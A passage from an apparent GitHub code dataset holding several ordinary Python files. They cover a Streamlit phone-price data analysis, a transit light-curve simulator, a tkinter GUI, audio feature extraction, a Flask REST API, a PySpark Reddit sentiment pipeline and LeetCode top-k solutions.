\",\r\n unsafe_allow_html=True,\r\n)\r\n\r\n\r\nst.subheader(\"Here is a snapshot of the dataset:\")\r\nst.write(df.head())\r\n\r\nst.markdown(\r\n \"\"\"\r\n| Column Name | Description |\r\n| :-------------: |:-------------:| \r\n| battery_power | Total energy a battery can store in one time measured in mAh | \r\n| blue | Has bluetooth or not | \r\n| clock_speed | speed at which microprocessor executes instructions | \r\n| dual_sim | Has dual sim support or not | \r\n| fc | Front Camera mega pixels | \r\n| four_g | Has 4G or not | \r\n| int_memory | Internal Memory in Gigabytes | \r\n| m_dep | Mobile Depth in cm | \r\n| mobile_wt | Weight of mobile phone | \r\n| n_cores | Number of cores of processor | \r\n| pc | Primary Camera mega pixels | \r\n| px_height | Pixel Resolution Height | \r\n| px_width | Pixel Resolution Width | \r\n| ram | Random Access Memory in Mega Bytes | \r\n| sc_h | Screen Height of mobile in cm | \r\n| sc_w | Screen Width of mobile in cm | \r\n| talk_time | longest time that a single battery charge will last on a phone call | \r\n| three_g | Has 3G or not | \r\n| touch_screen | Has touch screen or not | \r\n| wifi | Has wifi or not | \r\n| price_range | This is the target variable with value of 0(low cost), 1(medium cost), 2(high cost) and 3(very high cost) | \r\n\r\n\"\"\"\r\n)\r\n\r\nst.markdown(\"\\n\")\r\nst.markdown(\"\\n\")\r\n\r\nfig1 = plt.figure()\r\nsns.boxenplot(df.price_range, df.ram)\r\nplt.ylabel(\"RAM (in MB)\")\r\nplt.xlabel(\"Price\")\r\nplt.xticks(ticks=[0, 1, 2, 3], labels=[\"Low\", \"Medium\", \"High\", \"Very High\"])\r\n\r\nst.markdown(\r\n \" **Exploratory Data Analysis:** \",\r\n unsafe_allow_html=True,\r\n)\r\nst.markdown(\r\n \"Our primary focus will be - determing the **_relationships among features_**.\"\r\n)\r\nst.markdown(\"**Conclusively, we will evaluate whether this dataset is real or not.**\")\r\n\r\nst.markdown(\"Let's start with a Box plot of **Price** vs **RAM**\")\r\n\r\nst.write(fig1)\r\n\r\nst.markdown(\r\n \"RAM size and phone price are *__positively correlated__*! This makes intuitive sense.\"\r\n)\r\n\r\nst.markdown(\r\n \"Now a look at a Bar plot of **Number of phones that have a Touch Screen** and **color coding them with their respective price ranges**:\"\r\n)\r\n\r\nfig2 = plt.figure()\r\nsns.set_style(\"whitegrid\")\r\nsns.countplot(df.touch_screen, hue=df.price_range, palette=\"spring\")\r\nplt.xlabel(\"Touch Screen\")\r\nplt.xticks(ticks=[0, 1], labels=[\"No\", \"Yes\"])\r\nplt.legend(\r\n labels=[\"Low\", \"Moderate\", \"High\", \"Very High\"],\r\n shadow=True,\r\n loc=\"lower right\",\r\n title=\"Price\",\r\n fontsize=\"small\",\r\n)\r\n\r\nst.write(fig2)\r\n\r\nst.markdown(\r\n \"It appears that phones with touchscreens and no touchscreens are almost equally \\\r\n distributed among different price ranges. However, **it makes little sense that there\\\r\n are such a large number of _high_ and _very high_ priced phones with no touchscreens!** \\\r\n (in fact higher than their corresponding _low_ and _modernate_ price categories)\"\r\n)\r\n\r\nst.markdown(\r\n \"Next we are going to engineer a new feature! Dividing the pixel \\\r\n resolution height (*px_height*) by screen height in cm (*sc_h*) - we get \\\r\n pixels per cm of height. For simplicity, we will call this ** ppcm ** . \"\r\n)\r\n\r\ndf[\"ppcm\"] = df.px_height / df.sc_h\r\n\r\nst.write(df[[\"px_height\", \"sc_h\", \"ppcm\"]].head())\r\n\r\nst.markdown(\"Let's observe the median of ppcm of different price categories-\")\r\n\r\nfig3 = plt.figure()\r\nsns.set_style(\"darkgrid\")\r\nsns.barplot(df.price_range, df.ppcm, palette=\"ocean\")\r\nplt.ylabel(\"Median pixels per cm\")\r\nplt.xlabel(\"Price\")\r\nplt.xticks(ticks=[0, 1, 2, 3], labels=[\"Low\", \"Medium\", \"High\", \"Very High\"])\r\n\r\nst.write(fig3)\r\n\r\nst.markdown(\r\n \"_Low_ priced phones have a lower pixels per cm as compared to _High_ and _Very \\\r\n High_ priced phones. With the excpetion of _Moderately_ priced phones - where the \\\r\n median of ppcm is higher than that of _High_ priced phones, there seems to be a clear \\\r\n upward trend - **higher priced phones have a higher pixel density, which is the \\\r\n result of a sharper screen resolution.** This makes perfect intuitive sense as well!\"\r\n)\r\n\r\n\r\n# figx = alt.Chart(df).mark_point().encode(alt.X(\"pc:Q\"), alt.Y(\"fc:Q\"),)\r\n\r\n# st.altair_chart(figx, use_container_width=True)\r\n\r\nfig4 = plt.figure()\r\nsns.set_style(\"whitegrid\")\r\nsns.pointplot(\r\n df.four_g,\r\n df.clock_speed,\r\n hue=df.price_range,\r\n scale=1.3,\r\n dodge=True,\r\n palette=\"Set1\",\r\n)\r\nplt.ylabel(\"Processor Clock Speed (GHz)\")\r\nplt.xlabel(\"4G Enabled\")\r\nplt.xticks(ticks=[0, 1], labels=[\"No\", \"Yes\"])\r\nplt.legend(\r\n shadow=True, title=\"Price\", fontsize=\"small\",\r\n)\r\n\r\nst.write(fig4)\r\n\r\nst.markdown(\r\n \"An interesting trend that can be observed here is that category **_3_** priced \\\r\n (very high priced) phones have a higher clock speed on non - 4G enabled phones as \\\r\n compared to 4G enabled phones. \\\r\n This seems a little weird - as 4G enabled phones need faster (higher) clock rates\\\r\n than non - 4G enabled phones. This trend appears to be inverse for very high priced\\\r\n phones.\"\r\n)\r\n\r\n\r\nst.markdown(\r\n \"The next visualization is unfortunately our last - but it is special - it is interactive!\\\r\n We will take a look at ** RAM ** vs ** pixels per cm ** feature that we engineered earlier.\\\r\n Below this scatterplot, there is going to be a bar chart denoting the number of mobile phones\\\r\n belonging to that price range. This bar chart changes with the area selected on the scatterplot.\\\r\n *Please note that this is an interactive plot, so please go ahead and make a selection\\\r\n on the plot and watch the bar chart below change!*\"\r\n)\r\n\r\nbrush = alt.selection(type='interval')\r\n\r\npoints = alt.Chart(df).mark_point().encode(\r\n x='ram:Q',\r\n y='ppcm:Q',\r\n color=alt.condition(brush, 'price_range:N', alt.value('lightgray'))\r\n).properties(\r\n width=700,\r\n height=400).add_selection(\r\n brush\r\n)\r\n\r\nbars = alt.Chart(df).mark_bar().encode(\r\n y='price_range:N',\r\n color='price_range:N',\r\n x='count(price_range):Q'\r\n).properties(\r\n width=700).transform_filter(\r\n brush\r\n)\r\n\r\nst.altair_chart(points & bars, use_container_width=True)\r\n\r\nst.markdown(\"Ideally, the trend needs to upwards and positive - as expensive phones have higher pixel densities \\\r\nand more RAM. But there is something very unsettling here. We can observe that there are some phones which are in \\\r\n the ** very high (3)** price range and still have pretty poor pixel densities \\\r\n (lower right section of the scatterplot, populated by blue circles). This is not the case in a real world scenario. \\\r\n Such phones rarely get released and have extremely limited scope to attract customers generate revenue. \")\r\n\r\nst.markdown(\"\\n\")\r\n\r\nst.markdown(\"** Our final conclusion is that apart from the RAM feature, the other features _do NOT reflect real-world phone feature vs price relationships._\\\r\n This dataset might be synthetically generated with RAM being the only properly correlated feature. **\")","repo_name":"yashwantreddy/MobilePhones","sub_path":"streamlit_demo.py","file_name":"streamlit_demo.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"19632002379","text":"import matplotlib.pyplot as plt\nimport george\nimport itertools\nimport numpy as np\nimport batman\nimport os\n\ndef reverse_ld_coeffs(ld_law, q1, q2):\n if ld_law == 'quadratic':\n coeff1 = 2.*np.sqrt(q1)*q2\n coeff2 = np.sqrt(q1)*(1.-2.*q2)\n elif ld_law=='squareroot':\n coeff1 = np.sqrt(q1)*(1.-2.*q2)\n coeff2 = 2.*np.sqrt(q1)*q2\n elif ld_law=='logarithmic':\n coeff1 = 1.-np.sqrt(q1)*q2\n coeff2 = 1.-np.sqrt(q1)\n elif ld_law == 'linear':\n return q1,q2\n return coeff1,coeff2\n\ndef init_batman(t,law):\n \"\"\" \n This function initializes the batman code.\n \"\"\"\n params = batman.TransitParams()\n params.t0 = 0. \n params.per = 1. \n params.rp = 0.1 \n params.a = 15. \n params.inc = 87. \n params.ecc = 0. \n params.w = 90. \n if law == 'linear':\n params.u = [0.5]\n else:\n params.u = [0.1,0.3]\n params.limb_dark = law \n m = batman.TransitModel(params,t)\n return params,m\n\ndef get_transit_model(t,t0,P,p,a,inc,q1,q2,ld_law):\n params,m = init_batman(t,law=ld_law)\n coeff1,coeff2 = reverse_ld_coeffs(ld_law, q1, q2) \n params.t0 = t0\n params.per = P \n params.rp = p \n params.a = a\n params.inc = inc\n if ld_law == 'linear':\n params.u = [coeff1]\n else:\n params.u = [coeff1,coeff2]\n return m.light_curve(params)\n\ninputs = np.genfromtxt('w19_parameters.dat',unpack=True)\n\n# Standarize the inputs:\nfor i in range(len(inputs)):\n norm_input = (inputs[i] - np.mean(inputs[i]))/np.sqrt(np.var(inputs[i]))\n if i == 0:\n X = norm_input\n times = inputs[i]\n else:\n X = np.vstack((X,norm_input))\n\n# Define base flux (white) noise:\nsigma = 200*1e-6\nyerr = np.ones(len(times))*sigma\n\n# Define maximum variance (i.e., the total variance of the GP):\nmax_sigma = 2000.\nmax_var = (max_sigma*1e-6)**2\n\n# Define number of simulations:\nnsims = 300\n\n# Define transit model:\nt0 = times[len(times)/2]\nP = 3.0\np = 0.1\naR = 10.\ninc = 88.0\nq1,q2 = 0.5,0.5\nmodel = get_transit_model(times.astype('float64'),t0,P,p,aR,inc,q1,q2,'quadratic')\n\n# Name of the variables:\nnames = ['times','Deltas','FWHM','Z','g','trace']\nidx_names = range(len(names))\n\n# Generate all possible combinations of external parameters, and generate datasets:\nfor L in range(0, len(idx_names)+1):\n for subset in itertools.combinations(idx_names, L):\n if len(subset) != 0:\n for n in range(nsims):\n if n == 0:\n cnames = list( names[i] for i in subset)\n fname = '_'.join(cnames)\n os.mkdir(fname)\n fout = open(fname+'/dataset_'+str(n)+'.dat','w')\n # Generate nsims datasets per model:\n Xc = X[subset,:]\n # Generate gaussian process. For this, sample lambdas from uniform distribution:\n ndim = Xc.shape[0]\n lambdas = np.random.uniform(0,10,ndim)\n fout.write('# Lambdas: '+' '.join(lambdas.astype('str'))+' | Sigma: '+str(sigma*1e6)+' ppm | Max (GP) Sigma: '+str(max_sigma)+' ppm\\n')\n fout.write('# Times \\t Simulated data \\t Transit Model \\t GP\\n')\n # Compute kernel:\n kernel = max_var*george.kernels.ExpSquaredKernel(lambdas,ndim=ndim,axes=range(ndim))\n # Prepare GP object:\n gp = george.GP(kernel)\n gp.compute(Xc.T)\n # Sample GP, add gaussian noise and save\n GP = gp.sample(Xc.T)\n noise = np.random.normal(0.,sigma,len(times))\n total = model + GP + noise\n for i in range(len(times)):\n fout.write('{0:.10f} \\t {1:.10f} \\t {2:.10f} \\t {3:.10f}\\n'.format(times[i],total[i],model[i],GP[i]))\n","repo_name":"nespinoza/GPOS","sub_path":"data_generator/generate_datasets.py","file_name":"generate_datasets.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"26371789215","text":"import tkinter as tk\nfrom tkinter import Frame, ttk\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\n\nclass Vista_Pestaña1:\n def __init__(self, controlador):\n self.controlador = controlador\n\n self.ventanaP1 = tk.Tk()\n self.ventanaP1.title(\"Datos Generales\")\n self.ventanaP1.geometry(\"1200x700\")\n self.ventanaP1.resizable(False, False)\n\n self.main_frame = tk.Frame(self.ventanaP1)\n self.main_frame.pack(fill=tk.BOTH, expand=True)\n\n self.left_frame = tk.Frame(self.main_frame)\n self.left_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n self.right_frame = tk.Frame(self.main_frame)\n self.right_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n self.create_treeview()\n self.create_plot()\n self.label1 = tk.Label(self.left_frame, text=\"Nombre del archivo\")\n self.label1.pack()\n self.entry1 = tk.Entry(self.left_frame)\n self.entry1.pack()\n self.crear_boton()\n def agregar_datosarbolpestaña1(self, datos):\n for fila in self.tree1.get_children():\n self.tree1.delete(fila)\n for indice, fila in enumerate(datos):\n valores = fila\n self.tree1.insert('', 'end', text=str(indice), values=valores)\n def create_treeview(self):\n self.tree1 = ttk.Treeview(self.right_frame, height=20)\n self.tree1['columns'] = ('Columna1', 'Columna2', 'Columna3','Columna4')\n\n self.tree1.heading('#0', text='Índice')\n self.tree1.column('#0', anchor=tk.CENTER, width=80)\n self.tree1.heading('Columna1', text='Fuerza Horizontal \\n N')\n self.tree1.column('Columna1', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna2', text='Desplazamiento Horizontal \\n mm')\n self.tree1.column('Columna2', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna3', text='Desplazamiento Vertical \\n mm')\n self.tree1.column('Columna3', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna4', text='Esfuerzo cortante')\n self.tree1.column('Columna4', anchor=tk.CENTER, width=100)\n self.tree1.pack(side=tk.LEFT, padx=10, pady=10)\n\n def create_plot(self):\n fig1 = Figure(figsize=(5, 4), dpi=100)\n ax1 = fig1.add_subplot(111)\n x = [0, 0.4, 0.8, 1.2, 1.6, 2, 2.4, 2.8, 3.2, 3.6, 4]\n y = [0, 3.514132926, 5.551311434, 6.977336389, 7.894066718, 8.148714031, 8.148714031, 8.148714031, 8.148714031,\n 8.148714031, 8.148714031]\n ax1.scatter(x, y)\n ax1.plot(x, y, 'r-') # 'r-' indica una línea roja\n\n canvas = FigureCanvasTkAgg(fig1, master=self.left_frame)\n canvas.draw()\n canvas.get_tk_widget().pack(padx=10, pady=10)\n def crear_boton(self):\n self.boton = tk.Button(self.left_frame, text=\"Generar Graficas\", command=self.controlador.generar_pdf,\n width=25, height=5, borderwidth=2)\n self.boton.pack()\n def obtener_nombreArchivo(self):\n return self.entry1.get()\n def cerrar_pestaña(self):\n self.ventanaP1.destroy()\n def iniciar(self):\n self.ventanaP1.mainloop()","repo_name":"yair-r/nueva_MCD","sub_path":"Vista/vista_pestaña1.py","file_name":"vista_pestaña1.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71807424374","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport librosa as lb\nfrom librosa.display import specshow\n\n# Drop axis since data is only single channel\ndef squeeze(audio, labels):\n audio = tf.squeeze(audio, axis=-1)\n #audio = tf.expand_dims(audio, axis=-1)\n return audio, labels\n\ndef get_features(waveform, sample_rate):\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrogram = tf.abs(stfts)\n\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrogram = tf.tensordot(\n spectrogram, linear_to_mel_weight_matrix, 1)\n mel_spectrogram.set_shape(spectrogram.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n # Compute a stabilized log to get log-magnitude mel-scale spectrograms.\n log_mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)\n # Compute MFCCs from log_mel_spectrograms and take the first 13.\n mfcc = tf.signal.mfccs_from_log_mel_spectrograms(\n log_mel_spectrogram)[..., :128]\n\n features = tf.stack([spectrogram, mel_spectrogram, mfcc], axis=-1)\n #all_four = tf.squeeze(all_four, axis=1)\n return features\n\n\ndef get_spectrogram(waveform):\n # Convert the waveform to a spectrogram via a STFT.\n spectrogram = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n # Obtain the magnitude of the STFT.\n spectrogram = tf.abs(spectrogram)\n # Add a `channels` dimension, so that the spectrogram can be used\n # as image-like input data with convolution layers (which expect\n # shape (`batch_size`, `height`, `width`, `channels`).\n spectrogram = spectrogram[..., tf.newaxis]\n return spectrogram\n\ndef get_melspec(waveform, sample_rate):\n # A 1024-point STFT with frames of 64 ms and 75% overlap.\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrograms = tf.abs(stfts)\n\n # Warp the linear scale spectrograms into the mel-scale.\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrograms = tf.tensordot(\n spectrograms, linear_to_mel_weight_matrix, 1)\n mel_spectrograms.set_shape(spectrograms.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n mel_spectrograms = mel_spectrograms[..., tf.newaxis]\n\n return mel_spectrograms\n\ndef get_mfcc(waveform, sample_rate):\n\n # A 1024-point STFT with frames of 64 ms and 75% overlap.\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrograms = tf.abs(stfts)\n\n # Warp the linear scale spectrograms into the mel-scale.\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrograms = tf.tensordot(\n spectrograms, linear_to_mel_weight_matrix, 1)\n mel_spectrograms.set_shape(spectrograms.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n # Compute a stabilized log to get log-magnitude mel-scale spectrograms.\n log_mel_spectrograms = tf.math.log(mel_spectrograms + 1e-6)\n # Compute MFCCs from log_mel_spectrograms and take the first 13.\n mfccs = tf.signal.mfccs_from_log_mel_spectrograms(\n log_mel_spectrograms)[..., :13]\n mfccs = mfccs[..., tf.newaxis]\n\n return mfccs\n\n# Function to display spectrogram\ndef plot_spectrogram(spectrogram, ax):\n if len(spectrogram.shape) > 2:\n assert len(spectrogram.shape) == 3\n spectrogram = np.squeeze(spectrogram, axis=-1)\n # Convert the frequencies to log scale and transpose, so that the time is\n # represented on the x-axis (columns).\n # Add an epsilon to avoid taking a log of zero.\n log_spec = np.log(spectrogram.T + np.finfo(float).eps)\n height = log_spec.shape[0]\n width = log_spec.shape[1]\n X = np.linspace(0, np.size(spectrogram), num=width, dtype=int)\n Y = range(height)\n ax.pcolormesh(X, Y, log_spec)\n\n# Create Spectrogram dataset from audio files\ndef make_features_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_features(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n\n# Create Spectrogram dataset from audio files\ndef make_melspec_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_melspec(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n# Create Spectrogram dataset from audio files\ndef make_mfcc_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_mfcc(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n# Create Spectrogram dataset from audio files\ndef make_spec_ds(ds):\n return ds.map(\n map_func=lambda audio,label: (get_spectrogram(audio), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n\n# Define function to check if file is in WAV format\ndef is_wav(filename):\n '''\n Checks if files are .wav files\n Utility tool in converting wav to png files\n '''\n return filename.split('.')[-1] == 'wav'\n\ndef opus_to_wav(clips_path, save_path):\n for subdir in os.listdir(clips_path):\n word_path = os.path.join(clips_path, subdir)\n sp = os.path.join(save_path, clips_path[:len(clips_path) - 7][-2:] + \"-\" + subdir)\n os.makedirs(sp)\n print(\"Coverting OPUS to WAV for the\\\"\" + subdir +\"\\\" label\")\n print('++++++++++++++++++++++++++++++++++')\n for recording in os.listdir(word_path):\n recording_path = os.path.join(word_path, recording)\n wav_file = os.path.join(sp, recording.rstrip(\".opus\") + \".wav\")\n if not os.path.exists(wav_file):\n os.system(\"ffmpeg -i \\\"\" + recording_path + \"\\\" \\\"\" + wav_file + \"\\\"\")\n\ndef trim_audio(wav_file_loc):\n y,sr=lb.load(wav_file_loc) #load the file\n trim_file, index = lb.effects.trim(y) # Remove leading and trailing silence\n return trim_file, sr","repo_name":"chrispvasquez/ML-Commands","sub_path":"DLHelperFunctions.py","file_name":"DLHelperFunctions.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15620276340","text":"# File name: app.py\r\n# Author: Benjamin Corn\r\n# Date created: 2/20/2016\r\n# Date last modified: 2/25/2016\r\n# Python Version: 3.0\r\n\r\nfrom flask import Flask\r\nfrom flask.ext.sqlalchemy import SQLAlchemy\r\nfrom flask.ext.restless import APIManager\r\n\r\n# Starting new Flask app\r\napp = Flask(__name__)\r\n\r\n# Starting new sqlite database connection\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///classdata.db'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\n# RESTful API database model class\r\nclass Class(db.Model):\r\n\tid = db.Column(db.Integer, primary_key=True)\r\n\tclassnum = db.Column(db.Text)\r\n\tclassname = db.Column(db.Text)\r\n\tprofessor = db.Column(db.Text)\r\n\tclasstype = db.Column(db.Text)\r\n\tseats = db.Column(db.INT)\r\n\tbldgcode = db.Column(db.Text)\r\n\troomcode = db.Column(db.Text)\r\n\tclassdays = db.Column(db.Text)\r\n\tstarttime = db.Column(db.Text)\r\n\tendtime = db.Column(db.Text)\r\n\r\n# Push all structures to database\r\ndb.create_all()\r\n\r\n# Creating APIManager from restless extension\r\nmanager = APIManager(app, flask_sqlalchemy_db=db)\r\n\r\n# Defining valid HTML requests\r\nclass_blueprint = manager.create_api(Class, methods=['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])\r\n\r\n# Running Flask loop sequence\r\nif __name__ == \"__main__\":\r\n\tapp.run()\r\n","repo_name":"bencorn/BU-Scheduling-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38112294391","text":"import os\nfrom setuptools import find_packages, setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-lightcms',\n version='0.1',\n packages=find_packages(include=('lightcms')),\n include_package_data=True,\n license='BSD License', # example license\n description='A cms for developers.',\n long_description=README,\n url='https://github.com/eddmash/django-lightcms',\n author='Eddilbert Macharia',\n author_email='edd.cowan@gmail.com',\n classifiers=[\n ],\n)\n","repo_name":"eddmash/django-lightcms","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73385664692","text":"from pyspark import SparkContext\nfrom pyspark.sql import SQLContext\nimport pyspark.sql.functions as func\nfrom pyspark.sql.functions import from_unixtime\nfrom pyspark.sql.functions import dayofmonth, year, month, col, udf\nfrom pyspark.sql.types import DoubleType\nfrom pyspark.sql import DataFrameWriter\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport string\nimport psycopg2\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\n\nfile_name = \"RC_2005-12.bz2\"\nfile_path = \"s3a://redditcommentsbz2/\" + file_name\n\n# create Spark context\nmaster = os.getenv('master_host')\nsc = SparkContext(master, 'preprocess')\nsqlContext = SQLContext(sc)\n\n# read in data\n\ndata = sqlContext.read.json(file_path).select('created_utc', 'controversiality', 'link_id', 'score', 'body', 'author', 'subreddit', 'id')\\\n .withColumnRenamed('created_utc', 'time').withColumnRenamed('link_id','post_id').withColumnRenamed('body','comment').withColumnRenamed('id','comment_id') # rename columns\ndata = data.filter(~col('comment').isin(['[deleted]', '[removed]'])).filter(~col('author').isin(['[deleted]']))\ndata = data.withColumn('time', from_unixtime(data.time, format='yyyy-MM-dd HH:mm:ss')) # convert unixtime to datetime\ndf = data.withColumn('year', year(data.time)).withColumn('month', month(data.time)).withColumn('day', dayofmonth(data.time)) # calculate year, month, day\n\n# Create sentiment score for each comment\nsid = SentimentIntensityAnalyzer()\n\ndef remove_punctuation(x):\n \"\"\"\n Removes punctuation from comment to calculate sentiment score\n :param: x, str, reddit comment\n :return: nopunc_str, str, comment without punctuation\n \"\"\"\n punc='\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~'\n for ch in punc:\n nopunc_str = x.replace(ch, '')\n return nopunc_str\n\ndef vader(x):\n \"\"\"\n Calculates sentiment score of comment.\n :param: x, str, reddit comment with no punctuation\n :return: ss, double, sentiment score\n \"\"\"\n ss = sid.polarity_scores(x)['compound']\n return ss\n\n# apply udf so spark can interpret the functions\nnoPunctuation = udf(lambda x: remove_punctuation(x))\nsentimentScore = udf(lambda x: vader(x))\n\ndf = df.withColumn('clean_comment', noPunctuation(df.comment)) # remove punctuation from comment\ndf = df.withColumn('sentiment', sentimentScore(df.clean_comment)) # calculate sentiment score\ndf = df.withColumn(\"sentiment\", df[\"sentiment\"].cast(\"double\"))\n\n# CREATE TABLES\n\n# create comments table\ncomments = df.select('time', 'year','month','day','post_id','comment_id', 'author', 'comment', 'controversiality', 'score', 'sentiment', 'subreddit')\ncomments.show()\n# create posts table, containing posts and the percentage of negative comments\n#neg_comments = comments.filter(\"sentiment <= -0.7\").groupby('post_id').count()\n#neg_comments = neg_comments.withColumnRenamed(\"count\",\"num_neg_comments\")\n#num_comments_per_post = comments.groupby('post_id').count()\n#num_comments_per_post = num_comments_per_post.withColumnRenamed(\"count\", \"total_comments\")\n#posts = neg_comments.join(num_comments_per_post, 'post_id')\n#posts = posts.withColumn(\"% neg comments\", func.round(neg_comments[\"num_neg_comments\"]/num_comments_per_post[\"total_comments\"],2))\n#posts.show()\n# create user_history table\n#user_avg = df1.select('author','controversiality', 'score', 'sentiment').groupby('author').mean()\n#user_avg = user_avg.withColumnRenamed('avg(controversiality)','avg_controversiality').withColumnRenamed('avg(score)','avg_score').withColumnRenamed('avg(sentiment)','avg_sentiment')\n#user_comments = df1.groupby('author').count()\n#user_comments = user_comments.withColumnRenamed('count','num_comments')\n#user_history = user_avg.join(user_comments, 'author')\n#print('USER HISTORY')\n#user_history.show()\n\n# save file\n#comments.repartition(10).write.option('maxRecordsPerFile',100000).mode('overwrite').csv('/reddit_data/')\n\n\n# WRITE TO POSTGRES\ndb_host = os.getenv(\"db_host\")\ndb_password = os.getenv(\"db_password\")\ndb_port = os.getenv(\"db_port\")\ndb_name = os.getenv(\"db_name\")\ndb_url = \"jdbc:postgresql://\" + db_host + ':' + str(db_port) + '/' + db_name\n\ncomments_table_name = \"comments\"\nposts_table_name = \"posts\"\nproperties = {\n \"driver\": \"org.postgresql.Driver\",\n \"user\": db_user,\n \"password\": db_password}\nwrite_mode = 'append'\ncomments.write.jdbc(url = db_url, table = comments_table_name, mode = write_mode, properties = properties)\n#posts.write.jdbc(url = db_url, table = posts_table_name, mode = write_mode, properties = properties)\n\n","repo_name":"avenacheng/ModDash","sub_path":"data-processing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"18405660969","text":"from itertools import accumulate; from math import floor,ceil,sqrt; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce,cache; from heapq import *; import unittest; from typing import List,Optional; from functools import cache; from operator import lt, gt\nfrom binary_tree_tester import ser,des; from a_linked_list import make_linked_list\ndef get_sol(): return Solution()\n\nclass Solution:\n # bucket. Time: O(n)\n # https://www.youtube.com/watch?v=EYFcQRwcqk0&t=133s\n def topKFrequent(self, A: List[int], k: int) -> List[int]:\n n=len(A)\n di=Counter(A)\n bucket=[[] for _ in range(n+1)]\n for x in di:\n bucket[di[x]].append(x)\n res=[]\n for i in range(n,-1,-1):\n while k and bucket[i]:\n res.append(bucket[i].pop())\n k-=1\n return res\nclass Solution2:\n # heap\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n pq = []\n di = defaultdict(int)\n for num in nums:\n di[num]+=1\n\n for num in di:\n if len(pq)lowest_freq:\n heappop(pq)\n heappush(pq,(di[num],num))\n res = [x[1] for x in pq]\n return res\n\n# quick select\nclass Solution3:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n count = Counter(nums)\n unique = list(count.keys())\n\n def partition(left, right, pivot_index) -> int:\n pivot_frequency = count[unique[pivot_index]]\n # 1. move pivot to end\n unique[pivot_index], unique[right] = unique[right], unique[pivot_index]\n\n # 2. move all less frequent elements to the left\n i = left - 1\n for j in range(left, right):\n if count[unique[j]] < pivot_frequency:\n i += 1\n unique[i], unique[j] = unique[j], unique[i]\n\n # 3. move pivot to its final place\n unique[right], unique[i+1] = unique[i+1], unique[right]\n\n return i + 1\n\n def quickselect(left, right, k_smallest) -> None:\n \"\"\"\n Sort a list within left..right till kth less frequent element\n takes its place.\n \"\"\"\n # base case: the list contains only one element\n if left == right:\n return\n\n # select a random pivot_index\n pivot_index = random.randint(left, right)\n\n # find the pivot position in a sorted list\n pivot_index = partition(left, right, pivot_index)\n\n # if the pivot is in its final sorted position\n if k_smallest == pivot_index:\n return\n # go left\n elif k_smallest < pivot_index:\n quickselect(left, pivot_index - 1, k_smallest)\n # go right\n else:\n 